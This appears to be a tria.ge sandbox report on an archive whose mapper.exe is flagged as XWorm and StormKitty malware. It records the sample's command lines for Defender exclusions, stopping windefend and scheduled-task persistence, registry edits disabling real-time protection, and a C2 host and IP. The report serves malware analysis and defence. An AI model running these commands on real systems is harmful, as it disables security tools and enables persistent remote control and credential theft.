Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
542s -
max time network
543s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
04/12/2024, 22:25
Behavioral task
behavioral1
Sample
spoof test.7z
Resource
win11-20241007-en
General
-
Target
spoof test.7z
-
Size
50KB
-
MD5
2b80931dfec2265ac0357414e27497f4
-
SHA1
d7bfec86f61e214a8b43fcdcaaf82bda5e88557a
-
SHA256
9f83ee8c3f2263e2400f1dc667c58520a846d81b12e8d15f62e4dfeba4389b3b
-
SHA512
cb9443487acf4de4a33deb781ef206533cf5b4095671f08dd2b5607f388a82be8478b4db86b5ceaebb6f1dcd6958cd2d09399a0acea04ecb6d9368fb94cda203
-
SSDEEP
768:AH1u19IsbaKCa8fll6kehelKR8e1vmrnwJU2O3QLp5OYgtf8aGZqfTn:AVuXIsqaSlRehZRBF+/pip/glOcTn
Malware Config
Extracted
xworm
database-recommendations.gl.at.ply.gg:17666
-
Install_directory
%AppData%
-
install_file
System User.exe
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/3364-98-0x000000001B7C0000-0x000000001B7CE000-memory.dmp disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x001b00000002ab79-4.dat family_xworm behavioral1/memory/3364-13-0x0000000000990000-0x00000000009AA000-memory.dmp family_xworm -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" mapper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection mapper.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" mapper.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" mapper.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/3364-417-0x000000001D1A0000-0x000000001D2BE000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3364 created 704 3364 mapper.exe 7 -
Xworm family
-
pid Process 2436 powershell.exe 1140 powershell.exe 1084 powershell.exe 1852 powershell.exe 3600 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk mapper.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk mapper.exe -
Executes dropped EXE 9 IoCs
pid Process 3364 mapper.exe 3208 System User.exe 1448 System User.exe 2844 System User.exe 4416 System User.exe 3908 System User.exe 3772 System User.exe 4652 System User.exe 3368 System User.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User.exe" mapper.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" mapper.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3364 set thread context of 2220 3364 mapper.exe 102 -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1544 sc.exe 3076 sc.exe 1540 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry class 25 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Key created \Registry\User\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\NotificationData explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{d3162b92-9365-467a-956b-92703aca08af}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2776 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3204 explorer.exe 3364 mapper.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1140 powershell.exe 1140 powershell.exe 1084 powershell.exe 1084 powershell.exe 1852 powershell.exe 1852 powershell.exe 3600 powershell.exe 3600 powershell.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe 3364 mapper.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4636 7zFM.exe 3204 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 3456 msedge.exe 3456 msedge.exe -
Suspicious use of AdjustPrivilegeToken 54 IoCs
description pid Process Token: SeRestorePrivilege 4636 7zFM.exe Token: 35 4636 7zFM.exe Token: SeSecurityPrivilege 4636 7zFM.exe Token: SeDebugPrivilege 3364 mapper.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeDebugPrivilege 3364 mapper.exe Token: SeDebugPrivilege 3208 System User.exe Token: SeDebugPrivilege 1448 System User.exe Token: SeDebugPrivilege 2844 System User.exe Token: SeDebugPrivilege 4416 System User.exe Token: SeDebugPrivilege 808 powershell.exe Token: SeDebugPrivilege 3908 System User.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 3772 System User.exe Token: SeDebugPrivilege 4652 System User.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 4800 whoami.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 2400 whoami.exe Token: SeDebugPrivilege 3368 System User.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 4636 7zFM.exe 4636 7zFM.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe 3456 msedge.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3364 mapper.exe 2788 MiniSearchHost.exe 3204 explorer.exe 3204 explorer.exe 3364 mapper.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4636 wrote to memory of 3364 4636 7zFM.exe 78 PID 4636 wrote to memory of 3364 4636 7zFM.exe 78 PID 3364 wrote to memory of 1140 3364 mapper.exe 81 PID 3364 wrote to memory of 1140 3364 mapper.exe 81 PID 3364 wrote to memory of 1084 3364 mapper.exe 83 PID 3364 wrote to memory of 1084 3364 mapper.exe 83 PID 3364 wrote to memory of 1852 3364 mapper.exe 85 PID 3364 wrote to memory of 1852 3364 mapper.exe 85 PID 3364 wrote to memory of 3600 3364 mapper.exe 87 PID 3364 wrote to memory of 3600 3364 mapper.exe 87 PID 3364 wrote to memory of 2776 3364 mapper.exe 89 PID 3364 wrote to memory of 2776 3364 mapper.exe 89 PID 3364 wrote to memory of 808 3364 mapper.exe 99 PID 3364 wrote to memory of 808 3364 mapper.exe 99 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 3364 wrote to memory of 2220 3364 mapper.exe 102 PID 2220 wrote to memory of 4972 2220 cvtres.exe 103 PID 2220 wrote to memory of 4972 2220 cvtres.exe 103 PID 2220 wrote to memory of 4972 2220 cvtres.exe 103 PID 4972 wrote to memory of 2080 4972 powershell.exe 106 PID 4972 wrote to memory of 2080 4972 powershell.exe 106 PID 4972 wrote to memory of 2080 4972 powershell.exe 106 PID 3364 wrote to memory of 3456 3364 mapper.exe 110 PID 3364 wrote to memory of 3456 3364 mapper.exe 110 PID 3456 wrote to memory of 3592 3456 msedge.exe 111 PID 3456 wrote to memory of 3592 3456 msedge.exe 111 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 PID 3456 wrote to memory of 5020 3456 msedge.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2436 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:1540
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:2520
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:4620
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:1544
-
-
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\spoof test.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\7zOC125BAA7\mapper.exe"C:\Users\Admin\AppData\Local\Temp\7zOC125BAA7\mapper.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Sets desktop wallpaper using registry
- Suspicious use of SetThreadContext
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC125BAA7\mapper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mapper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.24 17666 <123456789> BE143A27526902829F123⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}4⤵
